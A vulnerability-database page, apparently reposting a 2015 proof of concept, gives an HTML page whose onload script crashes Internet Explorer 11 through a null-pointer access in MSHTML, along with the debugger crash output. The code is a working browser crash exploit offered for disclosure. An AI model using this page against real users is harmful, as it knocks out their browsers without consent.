Microsoft Internet Explorer 11 Crash PoC

2015.06.09

Credit: Pawel Wylecial

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

<!--
# Exploit title: Microsoft Internet Explorer 11 Crash PoC
# Date: 07.06.2015
# Vulnerable version: 11 (newest at the time 11.0.9600.17801)
# Tested on: Windows 7/8.1
# Author: Pawel Wylecial
# http://howl.overflow.pl @h0wlu
-->
<html>
<head>
<meta http-equiv="Cache-Control" content="no-cache"/>
<script>
function boom() {
var divA = document.createElement("div");
document.body.appendChild(divA);
try {
//divA.contentEditable = "true";
divA.outerHTML = "AAAA";
var context = divA['msGetInputContext']();
}
catch (exception) {
}
}
</script>
</head>
<body onload='boom();'>
</body>
</html>
<!--
(2534.480c): Access violation - code c0000005 (!!! second chance !!!)
eax=00000000 ebx=0fa48f84 ecx=00000000 edx=0a433fb8 esi=00000000 edi=0fa48e98
eip=5f302e86 esp=0c9db5a4 ebp=0c9db5c8 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
MSHTML!Tree::ElementNode::GetCElement:
5f302e86 f7410800001000 test dword ptr [ecx+8],100000h ds:002b:00000008=????????
-->

References:

http://howl.overflow.pl

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Microsoft Internet Explorer 11 Crash PoC

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.